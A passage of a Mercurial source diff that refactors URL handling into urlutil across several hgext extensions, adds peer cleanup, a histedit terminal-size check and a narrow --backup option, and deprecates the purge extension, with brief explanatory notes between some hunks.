- )
+ path = urlutil.get_unique_pull_path(b'fetch', repo, ui, source)[0]
+ other = hg.peer(repo, opts, path)
+ ui.status(_(b'pulling from %s\n') % urlutil.hidepassword(path))
revs = None
if opts[b'rev']:
try:
@@ -180,7 +181,7 @@
if not err:
# we don't translate commit messages
message = cmdutil.logmessage(ui, opts) or (
- b'Automated merge with %s' % util.removeauth(other.url())
+ b'Automated merge with %s' % urlutil.removeauth(other.url())
)
editopt = opts.get(b'edit') or opts.get(b'force_editor')
editor = cmdutil.getcommiteditor(edit=editopt, editform=b'fetch')
--- a/hgext/fix.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/fix.py Tue Apr 20 11:01:06 2021 -0400
@@ -131,8 +131,10 @@
import subprocess
from mercurial.i18n import _
-from mercurial.node import nullrev
-from mercurial.node import wdirrev
+from mercurial.node import (
+ nullrev,
+ wdirrev,
+)
from mercurial.utils import procutil
@@ -433,8 +435,9 @@
if not (len(revs) == 1 and wdirrev in revs):
cmdutil.checkunfinished(repo)
rewriteutil.precheck(repo, revs, b'fix')
- if wdirrev in revs and list(
- mergestatemod.mergestate.read(repo).unresolved()
+ if (
+ wdirrev in revs
+ and mergestatemod.mergestate.read(repo).unresolvedcount()
):
raise error.Abort(b'unresolved conflicts', hint=b"use 'hg resolve'")
if not revs:
--- a/hgext/git/__init__.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/git/__init__.py Tue Apr 20 11:01:06 2021 -0400
@@ -90,7 +90,7 @@
return os.path.join(self.path, b'..', b'.hg', f)
raise NotImplementedError(b'Need to pick file for %s.' % f)
- def changelog(self, trypending):
+ def changelog(self, trypending, concurrencychecker):
# TODO we don't have a plan for trypending in hg's git support yet
return gitlog.changelog(self.git, self._db)
--- a/hgext/git/gitlog.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/git/gitlog.py Tue Apr 20 11:01:06 2021 -0400
@@ -8,6 +8,7 @@
nullhex,
nullid,
nullrev,
+ sha1nodeconstants,
wdirhex,
)
from mercurial import (
@@ -217,7 +218,7 @@
n = nodeorrev
# handle looking up nullid
if n == nullid:
- return hgchangelog._changelogrevision(extra={})
+ return hgchangelog._changelogrevision(extra={}, manifest=nullid)
hn = gitutil.togitnode(n)
# We've got a real commit!
files = [
@@ -422,6 +423,8 @@
class manifestlog(baselog):
+ nodeconstants = sha1nodeconstants
+
def __getitem__(self, node):
return self.get(b'', node)
--- a/hgext/histedit.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/histedit.py Tue Apr 20 11:01:06 2021 -0400
@@ -242,6 +242,7 @@
from mercurial.utils import (
dateutil,
stringutil,
+ urlutil,
)
pickle = util.pickle
@@ -1040,11 +1041,12 @@
Used by initialization code"""
if opts is None:
opts = {}
- dest = ui.expandpath(remote or b'default-push', remote or b'default')
- dest, branches = hg.parseurl(dest, None)[:2]
- ui.status(_(b'comparing with %s\n') % util.hidepassword(dest))
-
- revs, checkout = hg.addbranchrevs(repo, repo, branches, None)
+ path = urlutil.get_unique_push_path(b'histedit', repo, ui, remote)
+ dest = path.pushloc or path.loc
+
+ ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest))
+
+ revs, checkout = hg.addbranchrevs(repo, repo, (path.branch, []), None)
other = hg.peer(repo, opts, dest)
if revs:
@@ -1581,10 +1583,19 @@
def layout(mode):
maxy, maxx = stdscr.getmaxyx()
helplen = len(helplines(mode))
+ mainlen = maxy - helplen - 12
+ if mainlen < 1:
+ raise error.Abort(
+ _(b"terminal dimensions %d by %d too small for curses histedit")
+ % (maxy, maxx),
+ hint=_(
+ b"enlarge your terminal or use --config ui.interface=text"
+ ),
+ )
return {
b'commit': (12, maxx),
b'help': (helplen, maxx),
- b'main': (maxy - helplen - 12, maxx),
+ b'main': (mainlen, maxx),
}
def drawvertwin(size, y, x):
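
The new guard makes the fixed layout explicit: the commit pane always takes 12 rows and the help pane takes helplen rows, so the main pane gets whatever is left. As a worked example with assumed numbers, a 24-row terminal with 7 help lines leaves mainlen = 24 - 7 - 12 = 5 rows for the rule list; at 19 rows or fewer (helplen + 12) mainlen drops below 1, and histedit now aborts with the resize hint instead of crashing inside curses.
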
@@ -1614,63 +1625,60 @@
stdscr.clear()
stdscr.refresh()
while True:
- try:
- oldmode, _ = state[b'mode']
- if oldmode == MODE_INIT:
- changemode(state, MODE_RULES)
- e = event(state, ch)
-
- if e == E_QUIT:
- return False
- if e == E_HISTEDIT:
- return state[b'rules']
+ oldmode, unused = state[b'mode']
+ if oldmode == MODE_INIT:
+ changemode(state, MODE_RULES)
+ e = event(state, ch)
+
+ if e == E_QUIT:
+ return False
+ if e == E_HISTEDIT:
+ return state[b'rules']
+ else:
+ if e == E_RESIZE:
+ size = screen_size()
+ if size != stdscr.getmaxyx():
+ curses.resizeterm(*size)
+
+ curmode, unused = state[b'mode']
+ sizes = layout(curmode)
+ if curmode != oldmode:
+ state[b'page_height'] = sizes[b'main'][0]
+ # Adjust the view to fit the current screen size.
+ movecursor(state, state[b'pos'], state[b'pos'])
+
+ # Pack the windows against the top, each pane spread across the
+ # full width of the screen.
+ y, x = (0, 0)
+ helpwin, y, x = drawvertwin(sizes[b'help'], y, x)
+ mainwin, y, x = drawvertwin(sizes[b'main'], y, x)
+ commitwin, y, x = drawvertwin(sizes[b'commit'], y, x)
+
+ if e in (E_PAGEDOWN, E_PAGEUP, E_LINEDOWN, E_LINEUP):
+ if e == E_PAGEDOWN:
+ changeview(state, +1, b'page')
+ elif e == E_PAGEUP:
+ changeview(state, -1, b'page')
+ elif e == E_LINEDOWN:
+ changeview(state, +1, b'line')
+ elif e == E_LINEUP:
+ changeview(state, -1, b'line')
+
+ # start rendering
+ commitwin.erase()
+ helpwin.erase()
+ mainwin.erase()
+ if curmode == MODE_PATCH:
+ renderpatch(mainwin, state)
+ elif curmode == MODE_HELP:
+ renderstring(mainwin, state, __doc__.strip().splitlines())
else:
- if e == E_RESIZE:
- size = screen_size()
- if size != stdscr.getmaxyx():
- curses.resizeterm(*size)
-
- curmode, _ = state[b'mode']
- sizes = layout(curmode)
- if curmode != oldmode:
- state[b'page_height'] = sizes[b'main'][0]
- # Adjust the view to fit the current screen size.
- movecursor(state, state[b'pos'], state[b'pos'])
-
- # Pack the windows against the top, each pane spread across the
- # full width of the screen.
- y, x = (0, 0)
- helpwin, y, x = drawvertwin(sizes[b'help'], y, x)
- mainwin, y, x = drawvertwin(sizes[b'main'], y, x)
- commitwin, y, x = drawvertwin(sizes[b'commit'], y, x)
-
- if e in (E_PAGEDOWN, E_PAGEUP, E_LINEDOWN, E_LINEUP):
- if e == E_PAGEDOWN:
- changeview(state, +1, b'page')
- elif e == E_PAGEUP:
- changeview(state, -1, b'page')
- elif e == E_LINEDOWN:
- changeview(state, +1, b'line')
- elif e == E_LINEUP:
- changeview(state, -1, b'line')
-
- # start rendering
- commitwin.erase()
- helpwin.erase()
- mainwin.erase()
- if curmode == MODE_PATCH:
- renderpatch(mainwin, state)
- elif curmode == MODE_HELP:
- renderstring(mainwin, state, __doc__.strip().splitlines())
- else:
- renderrules(mainwin, state)
- rendercommit(commitwin, state)
- renderhelp(helpwin, state)
- curses.doupdate()
- # done rendering
- ch = encoding.strtolocal(stdscr.getkey())
- except curses.error:
- pass
+ renderrules(mainwin, state)
+ rendercommit(commitwin, state)
+ renderhelp(helpwin, state)
+ curses.doupdate()
+ # done rendering
+ ch = encoding.strtolocal(stdscr.getkey())
def _chistedit(ui, repo, freeargs, opts):
--- a/hgext/infinitepush/__init__.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/infinitepush/__init__.py Tue Apr 20 11:01:06 2021 -0400
@@ -116,6 +116,7 @@
from mercurial.utils import (
procutil,
stringutil,
+ urlutil,
)
from mercurial import (
@@ -683,7 +684,13 @@
def _pull(orig, ui, repo, source=b"default", **opts):
opts = pycompat.byteskwargs(opts)
# Copy paste from `pull` command
- source, branches = hg.parseurl(ui.expandpath(source), opts.get(b'branch'))
+ source, branches = urlutil.get_unique_pull_path(
+ b"infinite-push's pull",
+ repo,
+ ui,
+ source,
+ default_branches=opts.get(b'branch'),
+ )
scratchbookmarks = {}
unfi = repo.unfiltered()
@@ -704,16 +711,19 @@
if scratchbookmarks:
other = hg.peer(repo, opts, source)
- fetchedbookmarks = other.listkeyspatterns(
- b'bookmarks', patterns=scratchbookmarks
- )
- for bookmark in scratchbookmarks:
- if bookmark not in fetchedbookmarks:
- raise error.Abort(
- b'remote bookmark %s not found!' % bookmark
- )
- scratchbookmarks[bookmark] = fetchedbookmarks[bookmark]
- revs.append(fetchedbookmarks[bookmark])
+ try:
+ fetchedbookmarks = other.listkeyspatterns(
+ b'bookmarks', patterns=scratchbookmarks
+ )
+ for bookmark in scratchbookmarks:
+ if bookmark not in fetchedbookmarks:
+ raise error.Abort(
+ b'remote bookmark %s not found!' % bookmark
+ )
+ scratchbookmarks[bookmark] = fetchedbookmarks[bookmark]
+ revs.append(fetchedbookmarks[bookmark])
+ finally:
+ other.close()
opts[b'bookmark'] = bookmarks
opts[b'rev'] = revs
@@ -805,7 +815,7 @@
return common, True, remoteheads
-def _push(orig, ui, repo, dest=None, *args, **opts):
+def _push(orig, ui, repo, *dests, **opts):
opts = pycompat.byteskwargs(opts)
bookmark = opts.get(b'bookmark')
# we only support pushing one infinitepush bookmark at once
@@ -833,25 +843,28 @@
oldphasemove = extensions.wrapfunction(
exchange, b'_localphasemove', _phasemove
)
- # Copy-paste from `push` command
- path = ui.paths.getpath(dest, default=(b'default-push', b'default'))
- if not path:
- raise error.Abort(
- _(b'default repository not configured!'),
- hint=_(b"see 'hg help config.paths'"),
- )
+
+ paths = list(urlutil.get_push_paths(repo, ui, dests))
+ if len(paths) > 1:
+ msg = _(b'cannot push to multiple paths with infinitepush')
+ raise error.Abort(msg)
+
+ path = paths[0]
destpath = path.pushloc or path.loc
# Remote scratch bookmarks will be deleted because remotenames doesn't
# know about them. Let's save it before push and restore after
remotescratchbookmarks = _readscratchremotebookmarks(ui, repo, destpath)
- result = orig(ui, repo, dest, *args, **pycompat.strkwargs(opts))
+ result = orig(ui, repo, *dests, **pycompat.strkwargs(opts))
if common.isremotebooksenabled(ui):
if bookmark and scratchpush:
other = hg.peer(repo, opts, destpath)
- fetchedbookmarks = other.listkeyspatterns(
- b'bookmarks', patterns=[bookmark]
- )
- remotescratchbookmarks.update(fetchedbookmarks)
+ try:
+ fetchedbookmarks = other.listkeyspatterns(
+ b'bookmarks', patterns=[bookmark]
+ )
+ remotescratchbookmarks.update(fetchedbookmarks)
+ finally:
+ other.close()
_saveremotebookmarks(repo, remotescratchbookmarks, destpath)
if oldphasemove:
exchange._localphasemove = oldphasemove
--- a/hgext/largefiles/basestore.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/largefiles/basestore.py Tue Apr 20 11:01:06 2021 -0400
@@ -12,6 +12,9 @@
from mercurial.i18n import _
from mercurial import node, util
+from mercurial.utils import (
+ urlutil,
+)
from . import lfutil
@@ -29,13 +32,13 @@
def longmessage(self):
return _(b"error getting id %s from url %s for file %s: %s\n") % (
self.hash,
- util.hidepassword(self.url),
+ urlutil.hidepassword(self.url),
self.filename,
self.detail,
)
def __str__(self):
- return b"%s: %s" % (util.hidepassword(self.url), self.detail)
+ return b"%s: %s" % (urlutil.hidepassword(self.url), self.detail)
class basestore(object):
@@ -79,7 +82,7 @@
if not available.get(hash):
ui.warn(
_(b'%s: largefile %s not available from %s\n')
- % (filename, hash, util.hidepassword(self.url))
+ % (filename, hash, urlutil.hidepassword(self.url))
)
missing.append(filename)
continue
--- a/hgext/largefiles/lfutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/largefiles/lfutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -206,6 +206,7 @@
repo.root,
repo.dirstate._validate,
lambda: sparse.matcher(repo),
+ repo.nodeconstants,
)
# If the largefiles dirstate does not exist, populate and create
@@ -513,7 +514,7 @@
def islfilesrepo(repo):
'''Return true if the repo is a largefile repo.'''
if b'largefiles' in repo.requirements and any(
- shortnameslash in f[0] for f in repo.store.datafiles()
+ shortnameslash in f[1] for f in repo.store.datafiles()
):
return True
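
The index change from f[0] to f[1] here (and in reposetup.py below) tracks a new leading entry in the tuples yielded by store.datafiles(); the narrowcommands hunk later in this patch unpacks the same four fields. A sketch of the new shape (the meaning of the first field is inferred, not spelled out in this patch):

    # (entry_type, name, name2, size) -- the file name moved to index 1
    for t, f, f2, size in repo.store.datafiles():
        if shortnameslash in f:
            ...
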
--- a/hgext/largefiles/overrides.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/largefiles/overrides.py Tue Apr 20 11:01:06 2021 -0400
@@ -1567,7 +1567,7 @@
# Calling purge with --all will cause the largefiles to be deleted.
# Override repo.status to prevent this from happening.
-@eh.wrapcommand(b'purge', extension=b'purge')
+@eh.wrapcommand(b'purge')
def overridepurge(orig, ui, repo, *dirs, **opts):
# XXX Monkey patching a repoview will not work. The assigned attribute will
# be set on the unfiltered repo, but we will only lookup attributes in the
--- a/hgext/largefiles/remotestore.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/largefiles/remotestore.py Tue Apr 20 11:01:06 2021 -0400
@@ -15,7 +15,10 @@
util,
)
-from mercurial.utils import stringutil
+from mercurial.utils import (
+ stringutil,
+ urlutil,
+)
from . import (
basestore,
@@ -40,11 +43,11 @@
if self.sendfile(source, hash):
raise error.Abort(
_(b'remotestore: could not put %s to remote store %s')
- % (source, util.hidepassword(self.url))
+ % (source, urlutil.hidepassword(self.url))
)
self.ui.debug(
_(b'remotestore: put %s to remote store %s\n')
- % (source, util.hidepassword(self.url))
+ % (source, urlutil.hidepassword(self.url))
)
def exists(self, hashes):
@@ -80,7 +83,7 @@
# keep trying with the other files... they will probably
# all fail too.
raise error.Abort(
- b'%s: %s' % (util.hidepassword(self.url), e.reason)
+ b'%s: %s' % (urlutil.hidepassword(self.url), e.reason)
)
except IOError as e:
raise basestore.StoreError(
--- a/hgext/largefiles/reposetup.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/largefiles/reposetup.py Tue Apr 20 11:01:06 2021 -0400
@@ -445,7 +445,7 @@
def checkrequireslfiles(ui, repo, **kwargs):
if b'largefiles' not in repo.requirements and any(
- lfutil.shortname + b'/' in f[0] for f in repo.store.datafiles()
+ lfutil.shortname + b'/' in f[1] for f in repo.store.datafiles()
):
repo.requirements.add(b'largefiles')
scmutil.writereporequirements(repo)
--- a/hgext/largefiles/storefactory.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/largefiles/storefactory.py Tue Apr 20 11:01:06 2021 -0400
@@ -12,6 +12,9 @@
hg,
util,
)
+from mercurial.utils import (
+ urlutil,
+)
from . import (
lfutil,
@@ -19,6 +22,7 @@
wirestore,
)
+
# During clone this function is passed the src's ui object
# but it needs the dest's ui object so it can read out of
# the config file. Use repo.ui instead.
@@ -28,24 +32,27 @@
if not remote:
lfpullsource = getattr(repo, 'lfpullsource', None)
- if lfpullsource:
- path = ui.expandpath(lfpullsource)
- elif put:
- path = ui.expandpath(b'default-push', b'default')
+ if put:
+ path = urlutil.get_unique_push_path(
+ b'lfpullsource', repo, ui, lfpullsource
+ )
else:
- path = ui.expandpath(b'default')
+ path, _branches = urlutil.get_unique_pull_path(
+ b'lfpullsource', repo, ui, lfpullsource
+ )
- # ui.expandpath() leaves 'default-push' and 'default' alone if
- # they cannot be expanded: fallback to the empty string,
- # meaning the current directory.
+ # XXX we should not explicitly pass b'default', as this will result in
+ # b'default' being returned if no `paths.default` was defined. We
+ # should explicitly handle the lack of value instead.
if repo is None:
- path = ui.expandpath(b'default')
- path, _branches = hg.parseurl(path)
+ path, _branches = urlutil.get_unique_pull_path(
+ b'lfs', repo, ui, b'default'
+ )
remote = hg.peer(repo or ui, {}, path)
elif path == b'default-push' or path == b'default':
remote = repo
else:
- path, _branches = hg.parseurl(path)
+ path, _branches = urlutil.parseurl(path)
remote = hg.peer(repo or ui, {}, path)
# The path could be a scheme so use Mercurial's normal functionality
@@ -71,7 +78,7 @@
raise error.Abort(
_(b'%s does not appear to be a largefile store')
- % util.hidepassword(path)
+ % urlutil.hidepassword(path)
)
--- a/hgext/lfs/blobstore.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/lfs/blobstore.py Tue Apr 20 11:01:06 2021 -0400
@@ -31,7 +31,10 @@
worker,
)
-from mercurial.utils import stringutil
+from mercurial.utils import (
+ stringutil,
+ urlutil,
+)
from ..largefiles import lfutil
@@ -725,7 +728,7 @@
https://github.com/git-lfs/git-lfs/blob/master/docs/api/server-discovery.md
"""
lfsurl = repo.ui.config(b'lfs', b'url')
- url = util.url(lfsurl or b'')
+ url = urlutil.url(lfsurl or b'')
if lfsurl is None:
if remote:
path = remote
@@ -739,7 +742,7 @@
# and fall back to inferring from 'paths.remote' if unspecified.
path = repo.ui.config(b'paths', b'default') or b''
- defaulturl = util.url(path)
+ defaulturl = urlutil.url(path)
# TODO: support local paths as well.
# TODO: consider the ssh -> https transformation that git applies
@@ -748,7 +751,7 @@
defaulturl.path += b'/'
defaulturl.path = (defaulturl.path or b'') + b'.git/info/lfs'
- url = util.url(bytes(defaulturl))
+ url = urlutil.url(bytes(defaulturl))
repo.ui.note(_(b'lfs: assuming remote store: %s\n') % url)
scheme = url.scheme
--- a/hgext/lfs/wrapper.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/lfs/wrapper.py Tue Apr 20 11:01:06 2021 -0400
@@ -116,10 +116,10 @@
if hgmeta or text.startswith(b'\1\n'):
text = storageutil.packmeta(hgmeta, text)
- return (text, True, {})
+ return (text, True)
-def writetostore(self, text, sidedata):
+def writetostore(self, text):
# hg filelog metadata (includes rename, etc)
hgmeta, offset = storageutil.parsemeta(text)
if offset and offset > 0:
--- a/hgext/mq.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/mq.py Tue Apr 20 11:01:06 2021 -0400
@@ -108,6 +108,7 @@
from mercurial.utils import (
dateutil,
stringutil,
+ urlutil,
)
release = lockmod.release
@@ -2509,7 +2510,7 @@
)
filename = normname(filename)
self.checkreservedname(filename)
- if util.url(filename).islocal():
+ if urlutil.url(filename).islocal():
originpath = self.join(filename)
if not os.path.isfile(originpath):
raise error.Abort(
@@ -2862,11 +2863,12 @@
# main repo (destination and sources)
if dest is None:
dest = hg.defaultdest(source)
- sr = hg.peer(ui, opts, ui.expandpath(source))
+ __, source_path, __ = urlutil.get_clone_path(ui, source)
+ sr = hg.peer(ui, opts, source_path)
# patches repo (source only)
if opts.get(b'patches'):
- patchespath = ui.expandpath(opts.get(b'patches'))
+ __, patchespath, __ = urlutil.get_clone_path(ui, opts.get(b'patches'))
else:
patchespath = patchdir(sr)
try:
--- a/hgext/narrow/narrowcommands.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/narrow/narrowcommands.py Tue Apr 20 11:01:06 2021 -0400
@@ -36,6 +36,9 @@
util,
wireprototypes,
)
+from mercurial.utils import (
+ urlutil,
+)
table = {}
command = registrar.command(table)
@@ -214,6 +217,7 @@
newincludes,
newexcludes,
force,
+ backup,
):
oldmatch = narrowspec.match(repo.root, oldincludes, oldexcludes)
newmatch = narrowspec.match(repo.root, newincludes, newexcludes)
@@ -272,10 +276,10 @@
hg.clean(repo, urev)
overrides = {(b'devel', b'strip-obsmarkers'): False}
with ui.configoverride(overrides, b'narrow'):
- repair.strip(ui, unfi, tostrip, topic=b'narrow')
+ repair.strip(ui, unfi, tostrip, topic=b'narrow', backup=backup)
todelete = []
- for f, f2, size in repo.store.datafiles():
+ for t, f, f2, size in repo.store.datafiles():
if f.startswith(b'data/'):
file = f[5:-2]
if not newmatch(file):
@@ -442,6 +446,12 @@
),
(
b'',
+ b'backup',
+ True,
+ _(b'back up local changes when narrowing'),
+ ),
+ (
+ b'',
b'update-working-copy',
False,
_(b'update working copy when the store has changed'),
@@ -583,81 +593,88 @@
# Find the revisions we have in common with the remote. These will
# be used for finding local-only changes for narrowing. They will
# also define the set of revisions to update for widening.
- remotepath = ui.expandpath(remotepath or b'default')
- url, branches = hg.parseurl(remotepath)
- ui.status(_(b'comparing with %s\n') % util.hidepassword(url))
+ r = urlutil.get_unique_pull_path(b'tracked', repo, ui, remotepath)
+ url, branches = r
+ ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(url))
remote = hg.peer(repo, opts, url)
- # check narrow support before doing anything if widening needs to be
- # performed. In future we should also abort if client is ellipses and
- # server does not support ellipses
- if widening and wireprototypes.NARROWCAP not in remote.capabilities():
- raise error.Abort(_(b"server does not support narrow clones"))
+ try:
+ # check narrow support before doing anything if widening needs to be
+ # performed. In future we should also abort if client is ellipses and
+ # server does not support ellipses
+ if (
+ widening
+ and wireprototypes.NARROWCAP not in remote.capabilities()
+ ):
+ raise error.Abort(_(b"server does not support narrow clones"))
- commoninc = discovery.findcommonincoming(repo, remote)
+ commoninc = discovery.findcommonincoming(repo, remote)
- if autoremoveincludes:
- outgoing = discovery.findcommonoutgoing(
- repo, remote, commoninc=commoninc
- )
- ui.status(_(b'looking for unused includes to remove\n'))
- localfiles = set()
- for n in itertools.chain(outgoing.missing, outgoing.excluded):
- localfiles.update(repo[n].files())
- suggestedremovals = []
- for include in sorted(oldincludes):
- match = narrowspec.match(repo.root, [include], oldexcludes)
- if not any(match(f) for f in localfiles):
- suggestedremovals.append(include)
- if suggestedremovals:
- for s in suggestedremovals:
- ui.status(b'%s\n' % s)
- if (
- ui.promptchoice(
- _(
- b'remove these unused includes (yn)?'
- b'$$ &Yes $$ &No'
+ if autoremoveincludes:
+ outgoing = discovery.findcommonoutgoing(
+ repo, remote, commoninc=commoninc
+ )
+ ui.status(_(b'looking for unused includes to remove\n'))
+ localfiles = set()
+ for n in itertools.chain(outgoing.missing, outgoing.excluded):
+ localfiles.update(repo[n].files())
+ suggestedremovals = []
+ for include in sorted(oldincludes):
+ match = narrowspec.match(repo.root, [include], oldexcludes)
+ if not any(match(f) for f in localfiles):
+ suggestedremovals.append(include)
+ if suggestedremovals:
+ for s in suggestedremovals:
+ ui.status(b'%s\n' % s)
+ if (
+ ui.promptchoice(
+ _(
+ b'remove these unused includes (yn)?'
+ b'$$ &Yes $$ &No'
+ )
)
- )
- == 0
- ):
- removedincludes.update(suggestedremovals)
- narrowing = True
- else:
- ui.status(_(b'found no unused includes\n'))
+ == 0
+ ):
+ removedincludes.update(suggestedremovals)
+ narrowing = True
+ else:
+ ui.status(_(b'found no unused includes\n'))
- if narrowing:
- newincludes = oldincludes - removedincludes
- newexcludes = oldexcludes | addedexcludes
- _narrow(
- ui,
- repo,
- remote,
- commoninc,
- oldincludes,
- oldexcludes,
- newincludes,
- newexcludes,
- opts[b'force_delete_local_changes'],
- )
- # _narrow() updated the narrowspec and _widen() below needs to
- # use the updated values as its base (otherwise removed includes
- # and addedexcludes will be lost in the resulting narrowspec)
- oldincludes = newincludes
- oldexcludes = newexcludes
+ if narrowing:
+ newincludes = oldincludes - removedincludes
+ newexcludes = oldexcludes | addedexcludes
+ _narrow(
+ ui,
+ repo,
+ remote,
+ commoninc,
+ oldincludes,
+ oldexcludes,
+ newincludes,
+ newexcludes,
+ opts[b'force_delete_local_changes'],
+ opts[b'backup'],
+ )
+ # _narrow() updated the narrowspec and _widen() below needs to
+ # use the updated values as its base (otherwise removed includes
+ # and addedexcludes will be lost in the resulting narrowspec)
+ oldincludes = newincludes
+ oldexcludes = newexcludes
- if widening:
- newincludes = oldincludes | addedincludes
- newexcludes = oldexcludes - removedexcludes
- _widen(
- ui,
- repo,
- remote,
- commoninc,
- oldincludes,
- oldexcludes,
- newincludes,
- newexcludes,
- )
+ if widening:
+ newincludes = oldincludes | addedincludes
+ newexcludes = oldexcludes - removedexcludes
+ _widen(
+ ui,
+ repo,
+ remote,
+ commoninc,
+ oldincludes,
+ oldexcludes,
+ newincludes,
+ newexcludes,
+ )
+ finally:
+ remote.close()
return 0
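
With the new flag, narrowing still writes strip backup bundles by default; the negated form skips them. An illustrative invocation (the include pattern is a placeholder):

    hg tracked --removeinclude subdir --no-backup
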
--- a/hgext/patchbomb.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/patchbomb.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# patchbomb.py - sending Mercurial changesets as patch emails
#
-# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -99,7 +99,10 @@
templater,
util,
)
-from mercurial.utils import dateutil
+from mercurial.utils import (
+ dateutil,
+ urlutil,
+)
stringio = util.stringio
@@ -379,7 +382,10 @@
if btype:
opts['type'] = btype
try:
- commands.bundle(ui, repo, tmpfn, dest, **opts)
+ dests = []
+ if dest:
+ dests = [dest]
+ commands.bundle(ui, repo, tmpfn, *dests, **opts)
return util.readfile(tmpfn)
finally:
try:
@@ -527,9 +533,9 @@
def _getoutgoing(repo, dest, revs):
'''Return the revisions present locally but not in dest'''
ui = repo.ui
- url = ui.expandpath(dest or b'default-push', dest or b'default')
- url = hg.parseurl(url)[0]
- ui.status(_(b'comparing with %s\n') % util.hidepassword(url))
+ paths = urlutil.get_push_paths(repo, ui, [dest])
+ safe_paths = [urlutil.hidepassword(p.rawloc) for p in paths]
+ ui.status(_(b'comparing with %s\n') % b','.join(safe_paths))
revs = [r for r in revs if r >= 0]
if not revs:
--- a/hgext/phabricator.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/phabricator.py Tue Apr 20 11:01:06 2021 -0400
@@ -103,6 +103,7 @@
from mercurial.utils import (
procutil,
stringutil,
+ urlutil,
)
from . import show
@@ -366,7 +367,7 @@
process(k, v)
process(b'', params)
- return util.urlreq.urlencode(flatparams)
+ return urlutil.urlreq.urlencode(flatparams)
def readurltoken(ui):
@@ -381,7 +382,7 @@
_(b'config %s.%s is required') % (b'phabricator', b'url')
)
- res = httpconnectionmod.readauthforuri(ui, url, util.url(url).user)
+ res = httpconnectionmod.readauthforuri(ui, url, urlutil.url(url).user)
token = None
if res:
--- a/hgext/purge.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/purge.py Tue Apr 20 11:01:06 2021 -0400
@@ -22,115 +22,11 @@
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
-'''command to delete untracked files from the working directory'''
-from __future__ import absolute_import
-
-from mercurial.i18n import _
-from mercurial import (
- cmdutil,
- merge as mergemod,
- pycompat,
- registrar,
- scmutil,
-)
-
-cmdtable = {}
-command = registrar.command(cmdtable)
-# Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
-# extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
-# be specifying the version(s) of Mercurial they are tested with, or
-# leave the attribute unspecified.
-testedwith = b'ships-with-hg-core'
-
-
-@command(
- b'purge|clean',
- [
- (b'a', b'abort-on-err', None, _(b'abort if an error occurs')),
- (b'', b'all', None, _(b'purge ignored files too')),
- (b'i', b'ignored', None, _(b'purge only ignored files')),
- (b'', b'dirs', None, _(b'purge empty directories')),
- (b'', b'files', None, _(b'purge files')),
- (b'p', b'print', None, _(b'print filenames instead of deleting them')),
- (
- b'0',
- b'print0',
- None,
- _(
- b'end filenames with NUL, for use with xargs'
- b' (implies -p/--print)'
- ),
- ),
- ]
- + cmdutil.walkopts,
- _(b'hg purge [OPTION]... [DIR]...'),
- helpcategory=command.CATEGORY_WORKING_DIRECTORY,
-)
-def purge(ui, repo, *dirs, **opts):
- """removes files not tracked by Mercurial
-
- Delete files not known to Mercurial. This is useful to test local
- and uncommitted changes in an otherwise-clean source tree.
-
- This means that purge will delete the following by default:
-
- - Unknown files: files marked with "?" by :hg:`status`
- - Empty directories: in fact Mercurial ignores directories unless
- they contain files under source control management
+'''command to delete untracked files from the working directory (DEPRECATED)
- But it will leave untouched:
-
- - Modified and unmodified tracked files
- - Ignored files (unless -i or --all is specified)
- - New files added to the repository (with :hg:`add`)
-
- The --files and --dirs options can be used to direct purge to delete
- only files, only directories, or both. If neither option is given,
- both will be deleted.
-
- If directories are given on the command line, only files in these
- directories are considered.
-
- Be careful with purge, as you could irreversibly delete some files
- you forgot to add to the repository. If you only want to print the
- list of files that this program would delete, use the --print
- option.
- """
- opts = pycompat.byteskwargs(opts)
- cmdutil.check_at_most_one_arg(opts, b'all', b'ignored')
+The functionality of this extension has been included in core Mercurial since
+version 5.7. Please use :hg:`purge ...` instead. :hg:`purge --confirm` is
+now the default, unless the extension is enabled for backward compatibility.
+'''
- act = not opts.get(b'print')
- eol = b'\n'
- if opts.get(b'print0'):
- eol = b'\0'
- act = False # --print0 implies --print
- if opts.get(b'all', False):
- ignored = True
- unknown = True
- else:
- ignored = opts.get(b'ignored', False)
- unknown = not ignored
-
- removefiles = opts.get(b'files')
- removedirs = opts.get(b'dirs')
-
- if not removefiles and not removedirs:
- removefiles = True
- removedirs = True
-
- match = scmutil.match(repo[None], dirs, opts)
-
- paths = mergemod.purge(
- repo,
- match,
- unknown=unknown,
- ignored=ignored,
- removeemptydirs=removedirs,
- removefiles=removefiles,
- abortonerror=opts.get(b'abort_on_err'),
- noop=not act,
- )
-
- for path in paths:
- if not act:
- ui.write(b'%s%s' % (path, eol))
+# This empty extension looks pointless, but core Mercurial checks if it's loaded
+# to implement the slightly different behavior documented above.
--- a/hgext/rebase.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/rebase.py Tue Apr 20 11:01:06 2021 -0400
@@ -67,6 +67,14 @@
cmdtable = {}
command = registrar.command(cmdtable)
+
+configtable = {}
+configitem = registrar.configitem(configtable)
+configitem(
+ b'devel',
